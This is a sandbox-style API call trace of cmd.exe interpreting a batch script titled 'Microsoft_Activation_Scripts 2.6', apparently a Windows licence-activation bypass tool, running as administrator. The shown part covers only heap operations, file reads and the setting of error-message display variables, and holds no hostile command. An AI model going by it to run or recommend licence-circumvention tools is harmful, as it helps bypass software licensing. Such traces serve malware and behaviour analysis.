GetProcessHeap () returned 0x19a8f1e0000 [0177.245] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0eb0) returned 1 [0177.245] GetProcessHeap () returned 0x19a8f1e0000 [0177.245] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec900) returned 1 [0177.245] GetProcessHeap () returned 0x19a8f1e0000 [0177.246] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee790) returned 1 [0177.246] GetProcessHeap () returned 0x19a8f1e0000 [0177.246] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0177.246] GetProcessHeap () returned 0x19a8f1e0000 [0177.246] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0177.246] GetProcessHeap () returned 0x19a8f1e0000 [0177.246] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec720) returned 1 [0177.246] GetProcessHeap () returned 0x19a8f1e0000 [0177.247] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee610) returned 1 [0177.247] GetProcessHeap () returned 0x19a8f1e0000 [0177.247] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9450) returned 1 [0177.247] GetProcessHeap () returned 0x19a8f1e0000 [0177.247] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0177.247] GetProcessHeap () returned 0x19a8f1e0000 [0177.248] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8a60) returned 1 [0177.248] GetProcessHeap () returned 0x19a8f1e0000 [0177.248] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0177.248] GetProcessHeap () returned 0x19a8f1e0000 [0177.248] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0177.248] GetProcessHeap () returned 0x19a8f1e0000 [0177.248] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec660) returned 1 [0177.248] GetProcessHeap () returned 0x19a8f1e0000 [0177.248] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc80) returned 1 [0177.248] GetProcessHeap () returned 0x19a8f1e0000 [0177.249] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca20) returned 1 [0177.249] GetProcessHeap () returned 0x19a8f1e0000 [0177.249] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0177.249] GetProcessHeap () returned 0x19a8f1e0000 [0177.249] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec700) returned 1 [0177.249] GetProcessHeap () returned 0x19a8f1e0000 [0177.249] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb00) returned 1 [0177.249] GetProcessHeap () returned 0x19a8f1e0000 [0177.249] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0177.250] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.250] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6d9ee [0177.250] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe830, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe830*=0x0, lpOverlapped=0x0) returned 1 [0177.250] GetLastError () returned 0x0 [0177.250] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.250] GetFileType (hFile=0x84) returned 0x1 [0177.250] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.250] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6d9ee [0177.250] GetProcessHeap () returned 0x19a8f1e0000 [0177.250] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f2026d0 [0177.250] GetProcessHeap () returned 0x19a8f1e0000 [0177.251] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2026d0) returned 1 [0177.251] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.251] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6d9ee [0177.251] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe830, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe830*=0x0, lpOverlapped=0x0) returned 1 [0177.251] GetLastError () returned 0x0 [0177.251] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.251] GetFileType (hFile=0x84) returned 0x1 [0177.251] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.251] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6d9ee [0177.251] GetProcessHeap () returned 0x19a8f1e0000 [0177.251] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f2026d0 [0177.251] GetProcessHeap () returned 0x19a8f1e0000 [0177.252] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2026d0) returned 1 [0177.252] longjmp () [0177.252] _tell (_FileHandle=3) returned 449006 [0177.252] _close (_FileHandle=3) returned 0 [0177.253] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.253] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.255] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.255] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.256] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.256] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.256] SetConsoleInputExeNameW () returned 0x1 [0177.256] GetConsoleOutputCP () returned 0x1b5 [0177.257] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.257] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.257] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.258] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.258] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.258] SetFilePointer (in: hFile=0x84, lDistanceToMove=3735, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe97 [0177.258] GetProcessHeap () returned 0x19a8f1e0000 [0177.258] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0177.258] GetProcessHeap () returned 0x19a8f1e0000 [0177.259] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0177.259] GetProcessHeap () returned 0x19a8f1e0000 [0177.259] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0177.259] GetProcessHeap () returned 0x19a8f1e0000 [0177.259] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0177.259] GetProcessHeap () returned 0x19a8f1e0000 [0177.260] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9f80) returned 1 [0177.260] GetProcessHeap () returned 0x19a8f1e0000 [0177.260] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0b30) returned 1 [0177.260] GetProcessHeap () returned 0x19a8f1e0000 [0177.260] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0cf0) returned 1 [0177.260] GetProcessHeap () returned 0x19a8f1e0000 [0177.261] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e09b0) returned 1 [0177.261] GetProcessHeap () returned 0x19a8f1e0000 [0177.261] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7a0) returned 1 [0177.261] GetProcessHeap () returned 0x19a8f1e0000 [0177.261] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0177.261] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.261] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe97 [0177.262] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.262] SetFilePointer (in: hFile=0x84, lDistanceToMove=3737, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe99 [0177.262] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\nt /b\r\nlow=\"40;93m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 2 [0177.262] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.262] GetFileType (hFile=0x84) returned 0x1 [0177.262] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.262] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe99 [0177.262] GetProcessHeap () returned 0x19a8f1e0000 [0177.262] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f2026d0 [0177.262] GetProcessHeap () returned 0x19a8f1e0000 [0177.262] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2026d0) returned 1 [0177.263] _tell (_FileHandle=3) returned 3737 [0177.263] _close (_FileHandle=3) returned 0 [0177.263] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.263] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.263] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.263] SetFilePointer (in: hFile=0x84, lDistanceToMove=3737, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe99 [0177.263] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.263] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe99 [0177.264] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.264] SetFilePointer (in: hFile=0x84, lDistanceToMove=3787, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xecb [0177.264] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"nceline=echo: &echo ==== ERROR ==== &echo:\"\r\n", cbMultiByte=50, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"nceline=echo: &echo ==== ERROR ==== &echo:\"\r\nc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 50 [0177.264] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.264] GetFileType (hFile=0x84) returned 0x1 [0177.264] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.264] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xecb [0177.264] GetProcessHeap () returned 0x19a8f1e0000 [0177.264] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f2026d0 [0177.264] GetProcessHeap () returned 0x19a8f1e0000 [0177.264] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2026d0) returned 1 [0177.265] _wcsicmp (_String1="set", _String2=")") returned 74 [0177.265] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0177.265] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0177.265] _wcsicmp (_String1="IF", _String2="set") returned -10 [0177.265] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0177.265] _wcsicmp (_String1="REM", _String2="set") returned -1 [0177.265] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0177.265] GetProcessHeap () returned 0x19a8f1e0000 [0177.265] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee610 [0177.265] GetProcessHeap () returned 0x19a8f1e0000 [0177.265] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd60 [0177.265] GetProcessHeap () returned 0x19a8f1e0000 [0177.265] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x6c) returned 0x19a8f1ffdd0 [0177.265] _tell (_FileHandle=3) returned 3787 [0177.265] _close (_FileHandle=3) returned 0 [0177.265] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.265] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.266] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.266] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.266] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.266] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.266] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.266] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.266] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.266] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.266] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.266] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.267] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.267] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.267] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.267] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.267] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.267] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.267] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.267] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.267] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.267] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.267] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.267] GetProcessHeap () returned 0x19a8f1e0000 [0177.267] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xc8) returned 0x19a8f1eaed0 [0177.267] GetProcessHeap () returned 0x19a8f1e0000 [0177.267] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eaed0, Size=0x6c) returned 0x19a8f1eaed0 [0177.267] GetProcessHeap () returned 0x19a8f1e0000 [0177.267] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaed0) returned 0x6c [0177.267] wcsncmp (_String1="\"nce", _String2="/", _MaxCount=0x4) returned -13 [0177.267] GetProcessHeap () returned 0x19a8f1e0000 [0177.267] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x74) returned 0x19a8f1eaf50 [0177.267] _wcsnicmp (_String1="\"n", _String2="/A", _MaxCount=0x2) returned -13 [0177.267] _wcsnicmp (_String1="\"n", _String2="/P", _MaxCount=0x2) returned -13 [0177.268] SetEnvironmentVariableW (lpName="nceline", lpValue="echo: &echo ==== ERROR ==== &echo:") returned 1 [0177.268] GetProcessHeap () returned 0x19a8f1e0000 [0177.268] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffec0) returned 1 [0177.268] GetEnvironmentStringsW () returned 0x19a8f1ffe50* [0177.268] GetProcessHeap () returned 0x19a8f1e0000 [0177.268] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xdb8) returned 0x19a8f200c10 [0177.268] memcpy (in: _Dst=0x19a8f200c10, _Src=0x19a8f1ffe50, _Size=0xdb8 | out: _Dst=0x19a8f200c10) returned 0x19a8f200c10 [0177.268] FreeEnvironmentStringsA (penv="=") returned 1 [0177.268] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.268] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.269] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.269] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.269] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.269] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.270] SetConsoleInputExeNameW () returned 0x1 [0177.270] GetConsoleOutputCP () returned 0x1b5 [0177.271] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.271] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.271] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.271] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.271] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.271] SetFilePointer (in: hFile=0x84, lDistanceToMove=3787, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xecb [0177.271] GetProcessHeap () returned 0x19a8f1e0000 [0177.272] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaf50) returned 1 [0177.272] GetProcessHeap () returned 0x19a8f1e0000 [0177.273] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0177.273] GetProcessHeap () returned 0x19a8f1e0000 [0177.273] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffdd0) returned 1 [0177.273] GetProcessHeap () returned 0x19a8f1e0000 [0177.273] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd60) returned 1 [0177.273] GetProcessHeap () returned 0x19a8f1e0000 [0177.274] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee610) returned 1 [0177.274] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.274] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xecb [0177.274] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.274] SetFilePointer (in: hFile=0x84, lDistanceToMove=3851, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf0b [0177.274] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"eline=echo: &call :_color %Red% \"==== ERROR ====\" &echo:\"\r\n", cbMultiByte=64, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"eline=echo: &call :_color %Red% \"==== ERROR ====\" &echo:\"\r\n2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 64 [0177.274] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.274] GetFileType (hFile=0x84) returned 0x1 [0177.274] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.274] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf0b [0177.274] GetProcessHeap () returned 0x19a8f1e0000 [0177.274] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f2019d0 [0177.274] GetProcessHeap () returned 0x19a8f1e0000 [0177.275] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f2059f0 [0177.275] GetProcessHeap () returned 0x19a8f1e0000 [0177.275] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecbe0 [0177.275] GetEnvironmentVariableW (in: lpName="Red", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x8 [0177.275] GetProcessHeap () returned 0x19a8f1e0000 [0177.275] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecbe0) returned 1 [0177.275] GetProcessHeap () returned 0x19a8f1e0000 [0177.276] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2059f0) returned 1 [0177.276] GetProcessHeap () returned 0x19a8f1e0000 [0177.276] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2019d0) returned 1 [0177.276] _wcsicmp (_String1="set", _String2=")") returned 74 [0177.276] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0177.276] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0177.276] _wcsicmp (_String1="IF", _String2="set") returned -10 [0177.276] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0177.276] _wcsicmp (_String1="REM", _String2="set") returned -1 [0177.276] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0177.276] GetProcessHeap () returned 0x19a8f1e0000 [0177.276] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0177.276] GetProcessHeap () returned 0x19a8f1e0000 [0177.276] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd80 [0177.277] GetProcessHeap () returned 0x19a8f1e0000 [0177.277] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x8e) returned 0x19a8f2026a0 [0177.277] _tell (_FileHandle=3) returned 3851 [0177.277] _close (_FileHandle=3) returned 0 [0177.277] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.277] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.277] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.277] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.277] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.277] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.277] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.277] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.277] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.277] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.277] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.277] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.278] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.278] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.278] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.278] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.278] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.278] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.278] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.278] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.278] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.278] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.278] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.278] GetProcessHeap () returned 0x19a8f1e0000 [0177.278] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x10c) returned 0x19a8f1eabb0 [0177.279] GetProcessHeap () returned 0x19a8f1e0000 [0177.279] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eabb0, Size=0x7e) returned 0x19a8f1eabb0 [0177.279] GetProcessHeap () returned 0x19a8f1e0000 [0177.279] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eabb0) returned 0x7e [0177.279] wcsncmp (_String1="\"eli", _String2="/", _MaxCount=0x4) returned -13 [0177.279] GetProcessHeap () returned 0x19a8f1e0000 [0177.279] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x96) returned 0x19a8f202920 [0177.279] _wcsnicmp (_String1="\"e", _String2="/A", _MaxCount=0x2) returned -13 [0177.279] _wcsnicmp (_String1="\"e", _String2="/P", _MaxCount=0x2) returned -13 [0177.279] SetEnvironmentVariableW (lpName="eline", lpValue="echo: &call :_color \"41;97m\" \"==== ERROR ====\" &echo:") returned 1 [0177.279] GetProcessHeap () returned 0x19a8f1e0000 [0177.279] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200c10) returned 1 [0177.279] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0177.280] GetProcessHeap () returned 0x19a8f1e0000 [0177.280] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xe30) returned 0x19a8f2029e0 [0177.280] memcpy (in: _Dst=0x19a8f2029e0, _Src=0x19a8f1eeb50, _Size=0xe30 | out: _Dst=0x19a8f2029e0) returned 0x19a8f2029e0 [0177.280] FreeEnvironmentStringsA (penv="=") returned 1 [0177.280] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.280] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.280] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.280] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.281] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.281] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.281] SetConsoleInputExeNameW () returned 0x1 [0177.281] GetConsoleOutputCP () returned 0x1b5 [0177.282] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: 